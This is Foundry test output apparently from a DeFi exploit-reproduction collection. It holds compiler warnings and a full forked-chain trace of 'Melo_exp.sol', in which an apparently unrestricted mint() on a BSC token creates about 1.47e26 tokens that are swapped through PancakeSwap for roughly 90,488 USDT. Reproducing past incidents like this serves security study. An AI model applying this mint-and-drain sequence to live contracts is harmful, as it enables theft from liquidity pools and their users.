Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.23s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2023-05/Melo_exp.sol:20:5:
   |
20 |     IERC20 USDT = IERC20(0x55d398326f99059fF775485246999027B3197955);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
    --> src/test/interface.sol:1878:1:
     |
1878 | interface USDT {
     | ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.64s (2.37ms CPU time)

Ran 1 test for src/test/2023-05/Melo_exp.sol:ContractTest
[PASS] testExploit() (gas: 123068)
Logs:
  Attacker USDT balance after exploit: 90488.680389646322334139

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 27960445 [2.796e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [159100] ContractTest::testExploit()
    ├─ [2496] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::balanceOf(0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628) [staticcall]
    │   └─ ← [Return] 2939318004043799027926976 [2.939e24]
    ├─ [32440] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::mint(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 146965900202189951396348800 [1.469e26], "")
    │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 146965900202189951396348800 [1.469e26])
    │   ├─  emit topic 0: 0xe7cd4ce7f2a465edc730269a1305e8a48bad821e8fb7e152ec413829c01a53c4
    │   │        topic 1: 0x0000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e1496
    │   │        topic 2: 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380
    │   │           data: 0x00000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000
    │   ├─  storage changes:
    │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380
    │   │   @ 2: 0x000000000000000000000000000000000000000000334902bc15a18cfe000000 → 0x000000000000000000000000000000000000000000acda4026132e3c02d20380
    │   └─ ← [Return] true
    ├─ [24607] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 146965900202189951396348800 [1.469e26])
    │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 146965900202189951396348800 [1.469e26])
    │   ├─  storage changes:
    │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380
    │   └─ ← [Return] true
    ├─ [72832] 0x10ED43C718714eb63d5aA57B78B54704E256024E::swapExactTokensForTokensSupportingFeeOnTransferTokens(146965900202189951396348800 [1.469e26], 0, [0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54, 0x55d398326f99059fF775485246999027B3197955], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1683338176 [1.683e9])
    │   ├─ [8979] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::transferFrom(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628, 146965900202189951396348800 [1.469e26])
    │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628, value: 146965900202189951396348800 [1.469e26])
    │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0xce133b994a922890d73b4a86ae29beb1b2834e6d4ee4e4f3b67bdea04f6983cf: 0x000000000000000000000000000000000000000000026e6cbf8f4f9d19b247c0 → 0x0000000000000000000000000000000000000000007bffaa298cdc4c1e844b40
    │   │   │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380 → 0
    │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380 → 0
    │   │   └─ ← [Return] true
    │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 10000000000000000 [1e16]
    │   ├─ [2893] 0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628::getReserves() [staticcall]
    │   │   └─ ← [Return] 92302979570391110751867 [9.23e22], 2939318004043799027926976 [2.939e24], 1683337492 [1.683e9]
    │   ├─ [496] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::balanceOf(0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628) [staticcall]
    │   │   └─ ← [Return] 149905218206233750424275776 [1.499e26]
    │   ├─ [45210] 0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628::swap(90488670389646322334139 [9.048e22], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   ├─ [10871] 0x55d398326f99059fF775485246999027B3197955::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 90488670389646322334139 [9.048e22])
    │   │   │   ├─ emit Transfer(from: 0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 90488670389646322334139 [9.048e22])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x426dca3108e29607db69780eea3842e12b1d46eccda3e5df50f1b5fd72337476: 0x00000000000000000000000000000000000000000000138bc12a1d20241d967b → 0x0000000000000000000000000000000000000000000000625a990b43ef191cc0
    │   │   │   │   @ 0xb38645331535d8a24250bd866c230d0d85c11b90105fdba49ccc7bb4d9c6bc96: 0x000000000000000000000000000000000000000000000000002386f26fc10000 → 0x00000000000000000000000000000000000000000000132966b498cea4c579bb
    │   │   │   └─ ← [Return] true
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628) [staticcall]
    │   │   │   └─ ← [Return] 1814309180744788417728 [1.814e21]
    │   │   ├─ [496] 0x9A1aEF8C9ADA4224aD774aFdaC07C24955C92a54::balanceOf(0x6a8C4448763C08aDEb80ADEbF7A29b9477Fa0628) [staticcall]
    │   │   │   └─ ← [Return] 149905218206233750424275776 [1.499e26]
    │   │   ├─ emit Sync(reserve0: 1814309180744788417728 [1.814e21], reserve1: 149905218206233750424275776 [1.499e26])
    │   │   ├─ emit Swap(sender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, amount0In: 0, amount1In: 146965900202189951396348800 [1.469e26], amount0Out: 90488670389646322334139 [9.048e22], amount1Out: 0, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   ├─  storage changes:
    │   │   │   @ 9: 0x000000000000000000000000000000113794b91b33655f56bd654e59159f8e2e → 0x000000000000000000000000000000118caa2e787e764d8e8ee6e5994a550b76
    │   │   │   @ 10: 0x0000000000000000000000000000000004364c8e0d01de1aeb1901ecf70b34af → 0x00000000000000000000000000000000044bc7520ff9aa11716e1692cb2dae2b
    │   │   │   @ 8: 0x6455b114000000026e6cbf8f4f9d19b247c000000000138bc12a1d20241d967b → 0x6455b3c00000007bffaa298cdc4c1e844b400000000000625a990b43ef191cc0
    │   │   └─ ← [Stop]
    │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   └─ ← [Return] 90488680389646322334139 [9.048e22]
    │   └─ ← [Stop]
    ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 90488680389646322334139 [9.048e22]
    ├─ [2425] 0x55d398326f99059fF775485246999027B3197955::decimals() [staticcall]
    │   └─ ← [Return] 18
    ├─ emit log_named_decimal_uint(key: "Attacker USDT balance after exploit", val: 90488680389646322334139 [9.048e22], decimals: 18)
    ├─  storage changes:
    │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380
    │   @ 0x44bf1039324fcbfda472196706fa68525cb38db0f3d91f5ca7d489ff92357e45: 0 → 0x00000000000000000000000000000000000000000079913d69fd8caf04d20380
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 10.75s (6.94s CPU time)

Ran 2 test suites in 11.73s (12.39s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
